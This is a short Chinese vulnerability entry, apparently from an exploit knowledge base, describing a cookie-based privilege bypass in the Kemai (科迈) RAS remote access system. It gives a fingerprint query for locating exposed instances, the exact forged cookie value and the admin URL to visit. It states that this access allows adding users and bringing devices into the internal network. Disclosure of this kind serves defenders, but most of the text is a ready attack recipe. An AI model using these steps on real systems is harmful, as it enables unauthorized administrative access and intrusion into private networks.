# 科迈 RAS系统 Cookie验证越权漏洞

# 漏洞描述

科迈 RAS系统存在Cookie验证越权，当 RAS_Admin_UserInfo_UserName 设置为 admin 时可访问后台

# 漏洞影响

科迈 RAS系统

# 网络测绘

app="科迈-RAS系统"

# 漏洞复现

登录页面如下

添加Cookie

RAS_Admin_UserInfo_UserName=admin

1

访问 /Server/CmxUser.php?pgid=UserList

获取后可以添加用户，授权登陆设备直接接入内网

宝塔 phpmyadmin未授权访问漏洞科达 MTS转码服务器任意文件读取漏洞